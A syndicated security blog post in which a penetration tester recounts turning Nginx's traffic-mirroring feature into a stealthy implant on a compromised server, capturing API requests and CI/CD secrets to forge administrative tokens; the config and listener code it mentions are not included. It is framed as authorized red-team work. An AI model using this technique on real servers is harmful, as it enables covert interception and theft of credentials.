SBN

My secret to API privesc: Tapping compromised web servers

It was about three in the afternoon on a Friday. Of course it was.

The spring rain was beating down with a weird cadence, like drummers were marching us into the weekend. Hey, it’s the Pacific Northwest. This is normal.

I was tired. All week I helped a client with a pentest for a new SaaS service that was about to go into production. I made good progress, getting a foothold on a frontend Nginx server that routed all their APIs.

But pivoting was getting difficult.

Until I decided to play by a different set of rules.

Yep… you just got Rick rolled 🤣

Security (mis)configuration

I was thinking about the OWASP API Security Top 10, which gave me an idea. One of the top 10 categories is always about security misconfiguration. Usually, it’s about missing patches, systems out of date, or how security hardening hasn’t been applied for things like CORS policies or TLS requirements.

But another weakness many people don’t think about in the security misconfiguration category is when unnecessary “features” are enabled in the web server when they shouldn’t be.

This got me thinking. What could we do with the access I had to Nginx?

I already thought about capturing traffic with tcpdump, but I didn’t have the appropriate privileges on the server to go into promisc mode. And the server was resource starved with almost no disk space, so trying to proxy traffic and store it locally wasn’t a practical option.

What else could I do? What would a real malicious actor do?

Thinking like the bad guy

Earlier in the week, I came across an article about how state actors like to drop implants on servers they compromise and come back to them later.

One of the persistence techniques used was to inject a benign Apache module that laid dormant until a specific HTTP request sequence was detected. It would then spring into action and open a backdoor to the server when it saw such a request.

But I didn’t have Apache here. It was Nginx. Did they support any sort of construct like this?

RTFM

I decided the best way to understand what Nginx could do was to go read the docs. I already had the basics down and understood how Nginx worked as an API gateway proxy.

But wow… it could do a whole lot more.

It’s a content cache. A reverse proxy. A web accelerator. A load balancer. The list goes on and on.

And to my instant delight as soon as I saw it, it can do out-of-band mirroring.

You know… mirroring. To take inbound requests and send them somewhere else to be captured without impacting the actual production service. It’s a friggen’ wiretap built right into the server, ideal for persistent implants.

This could be fun.

Building a badass implant listener

So Nginx could mirror inbound traffic. But there has to be something listening on the other end that can collect the mirrored data.

Sure, pretty much any kind of HTTP server should be able to do that. But if it’s not purpose-built, it might hang connections or return the wrong status codes when the request paths don’t match.

A bit of Python can do the trick. Just capture any request sent and dump it into a file to review later and return a success code. It could be something as simple as this script I wrote.

I don’t want to record all traffic, so I added some Content-Type filtering to only look for JSON or form data and added a filter to block inbound IPs except for those coming from the implants I want to listen to.

It works pretty well, most of the time. I later rewrote the listener to be multithreaded and stored each implant’s content in its own file to make data management easier.

But that’s a discussion for another day.

With my implant listener now logging all relevant requests, it was time to tap Nginx.

Tapping Nginx

So when I first stumbled upon the mirror feature in Nginx, it looked simple enough. But I ended up stumbling a few times once I started actually using it.

The documentation was rather clear. You basically set the mirror directive on the location(s) you want to mirror and route them through another location that will proxy to your listener. The configuration looks something like this:

This configuration would create a subrequest for the mirrored server but ignore the response.

Here was where I had my first stumbling block. It ends up not this easy. Jitter between servers and delays would slow down the production requests. Noticeably slower.

Timeout hell kills Nginx

While I was testing this on my own ephemeral resources, I could see delays when the mirror failed in some way. My original Python code was slow and handled one request at a time. Nginx would basically throttle the production connections to the real API endpoints while waiting for responses.

Worse yet, if I didn’t start the implant listener before Nginx, it would fail to start Nginx and eventually die with an “Upstream host is unavailable” error message.

As this was a red team pentest engagement, we didn’t want to be detected at this point. So this configuration was unacceptable.

The blue team didn’t know we had a foothold on the Nginx servers yet, and we did NOT want to slow down the API or prevent Nginx from functioning, which might alert them to our presence.

It ended up that these edge case timeouts were a known issue. They could be fixed by setting a local resolver and an aggressive proxy timeout.

So the configuration needed to be updated.

This workaround uses a dedicated ‘local’ resolver for the upstream implant listener and stores it in a variable we can reference in the mirror config. We also tune the proxy connection timeouts so Nginx doesn’t wait and time out.

With that now reliably working, we can tune what we are mirroring to get useful information that may help us pivot.

Configuring the Mirroring to capture API requests

I had one last thing I wanted to do. And that was to make sure I was mirroring EVERYTHING I needed to gain deeper operational insights into the API services we were testing. It was here that I leveraged some of the tactics those API security testing vendors use to capture traffic for security analysis.

Companies like Salt Security and Wallarm have been mirroring API endpoints for years. Why not take a page from their playbook and turn it to our advantage?

Like this Wallarm documentation. It perfectly explains how to set the Nginx configuration to collect the most information. And with that, we now have a more mature configuration to collect all the API requests we want. The mirror config looks something like this now:

And with that, we now have configured mirrored traffic to the implant listener, listed the headers to be mirrored, and specified the destination IP address/domain name of the machine where to send the data.

I moved everything to the production servers and watched my listener start recording my traffic as I launched a small Postman Collection Runner test suite.

Sweet. Success. Time to show everyone the tap I just built.

The results

In my excitement of building all this out, I didn’t realize it was now in the early evening of Friday. The office was a ghost town; it seemed everyone left for the weekend. Where the heck did the last few hours go? And why the heck didn’t anyone bang on my door and say goodbye?

How rude.

I decided to leave everything running and headed home. I figured I’d pick up where I left off on Monday when everyone was back in the office.

And boy, was Monday morning a blast.

As soon as I sat down and looked at the data on my implant listener server, I saw gigabytes of log data.

WTF?

Unbeknownst to us all, the blue team pushed new versions of everything over the weekend, including a couple of services we didn’t initially find during recon.

The one that excited me was an app token exchange endpoint that was designed to be used internally to mint administrative tokens for all the backend services. It was only used during blue/green deployments to help automate their CI/CD pipeline as they transitioned between staging and production.

You gotta love it when people automate DevOps using APIs. Why this was going through the front-end Nginx servers was just bonkers to me.

But I digress.

The request logger stored all the data I needed. I had collected the application client ID and secret of the CI/CD pipeline process, along with all the special headers required to communicate between services to forge administrative tokens. And thanks to the weekend updates (go blue team!), I had all the info to use this token exchange service and gain administrative access to every host on the cluster.

All thanks to this little tap.

Game over.

Post-mortem years later

Looking back on this, I realize I now have several weapons in my arsenal that came from the experiences gained during this engagement.

I now have custom modules and/or workflows for Apache, IIS, Tomcat, Kestrel, and Flask that mirror traffic and dump API requests to my request listeners. And it’s one of the first things I do once I gain a foothold on a web server.

It has led to several different privesc options over the years.

I also now run my listeners serverless and dump to table storage, so managing all the data during an engagement is easier. And I only pay for computing as it’s used, so it’s much easier to know which client to bill.

Except for that one time when a client’s blue team reverted a service from backup and accidentally reinstalled one of my implants while I was away on holiday, triggering one of their new IDS sensors and causing a real stir in their SOC.

That is a story for another day.

Conclusion

I don’t share this story to impress you but to impress upon you that when conducting API pentests, you sometimes need to think outside the box.

API privesc can be tricky. But if you have an opportunity to tap compromised apps and infrastructure, you may gain operational insights that can lead you to that privilege escalation you are looking for.

I’m sure I don’t have to state the obvious, but this is aggressive. You should only be doing this with permission from your client, and you better know what you’re doing. Hopefully, you can do this in a non-production environment that will avoid causing critical business impact.

Ensure you have emergency contact information for the blue team to communicate with them if you screw something up. And above all else, be nice.

The red team usually has a bad rep as it is… giving more work to the blue team when you break something is never a good thing. Especially when a weekend is approaching. 🤣

One last thing…

API Hacker Inner Circle

The API Hacker Inner Circle is growing. It’s my FREE weekly newsletter where I share articles like this, along with pro tips, industry insights, and community news that I don’t tend to share publicly. If you haven’t yet, join us by subscribing at https://apihacker.blog.

The post My secret to API privesc: Tapping compromised web servers appeared first on Dana Epp's Blog.

*** This is a Security Bloggers Network syndicated blog from Dana Epp's Blog authored by Dana Epp. Read the original post at: https://danaepp.com/my-secret-to-api-privesc-tapping-compromised-web-servers